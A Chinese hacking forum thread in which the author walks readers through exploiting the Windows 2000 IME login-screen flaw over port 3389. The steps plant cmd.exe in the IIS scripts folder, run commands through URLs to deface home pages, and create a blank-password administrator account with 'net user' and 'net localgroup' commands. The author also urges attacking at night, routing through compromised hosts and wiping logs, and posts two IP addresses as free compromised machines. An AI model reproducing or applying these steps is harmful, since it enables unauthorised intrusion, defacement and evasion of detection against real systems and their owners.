返回列表 回复 发帖

【原创】记一次3389端口的攻击

以前我对网络安全有点兴趣,学了几天,曾经胡乱用端口扫描程序扫了些IP,尝试远程入侵了一些主机,但要声明,我可没有干过坏事。呵呵,问问丸子就知道我有多善良多可亲咯~~嘻嘻~~~
--------------------------------
windows2000的终端服务程序是以图形界面远程访问主机的3389端口,而微软的Windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。

1、用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。

2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。

3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。

4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。

5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe.

6、选择"保存到磁盘"。

7、选择目录:c:\inetpub\scripts\

8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (看到什么了?)

嘿嘿,接下去可以做很多的事情了,比如修改主页啦,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+wolaile+>c:\inetpub\wwwroot\default.*
xx.xx.xx.xx/scripts/cmd.exe?/c+echo+wolaile+>c:\inetpub\wwwroot\index.*
当然如果你够狠,可以上传个木马之类的,运行后,通过控制端控制对方机器。

这是一个简单的例子,不过大家可不要乱来,要来也最好在深夜的时候,趁网管不在,偷偷溜上去玩会,也不要玩得太过份哦。最好找台肉鸡做跳板攻击,免得惹祸上身,因为攻击会留下日志的,如果你不会删除日志的话,最好别试~~~
我送大家两台肉鸡用用吧~见面礼咯~
210.41.188.4    210.41.188.32
---------------------------------------被抓了别说我-----------------------------------
嘻嘻~要不跟你没完~~~
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]

Re:【原创】记一次3389端口的攻击

补充一点,index.* default.*
其实是index.htm  index.html  index.asp之类的文件名!具体情况看你攻击的对象!
default.* 同上!!!
要找工具到521hacker.com上找,我很久没玩了,
别叫我送工具~~~麻烦~~
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]

Re:【原创】记一次3389端口的攻击

哎,既然说了,干脆说个痛快~~
你们爱怎么玩就怎么玩吧,只要出事了别出卖我就行了~~
憋着不说真难受~
-------------------------------
上面提到的方法有两个缺陷:
一、要求目标主机开放了web服务
二、因为IUSR_机器名是用来访问web的默认账号,权限不够,所以很多事情做不了。
可以尝试下面的方法:
“跳转到URL”中输入c:\winnt\system32就可以看到该目录的内容,然后在cmd.exe上面按右键,“建立快捷方式”,就会看到一个cmd.exe的快捷方式出现,右键点击该快捷方式-〉属性,在目标后面加上:net user abc /add,运行它,就加入了一个用户名为abc,密码为空的用户,再右击该快捷方式-〉属性,目标后面的字改成 net localgroup administrators abc /add,运行,就将该用户加入了管理员组,之后就可以很放心的用这个用户登录了,省却很多麻烦。
---------------------------------
不过输入法漏洞几乎绝迹了,很难找到啦:)只要打了sp1的就没有这个漏洞了,而一般做服务器的机子如果不打补丁,就是该死的机器,管理员一般不管,那就可以放心玩了:)
还是那句老话,我还想混呢,别搞出事,成功了的话,玩玩就好,
别太过分!!!
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]

Re:【原创】记一次3389端口的攻击

好!经典!我要背下来。。。

Re:【原创】记一次3389端口的攻击

不值得为这个花太多时间~
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]

Re:【原创】记一次3389端口的攻击

我背不下来。呜~~~

Re:【原创】记一次3389端口的攻击

呵呵~~,去学点新的东西,你也知道我很久没玩了,
那点技术早落伍了~~
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]

Re:【原创】记一次3389端口的攻击

唉,主要是时间。。。

Re:【原创】记一次3389端口的攻击

也对,如果真的完事如意的话,我们两个可能要累死咯~
呵呵
http://www.880770.com/bbs [B]我愿爱你像一杯茶,把苦涩留在心里,发散出来的,都是清香爱你,在每次呼吸的瞬间![/COLOR][/B]
返回列表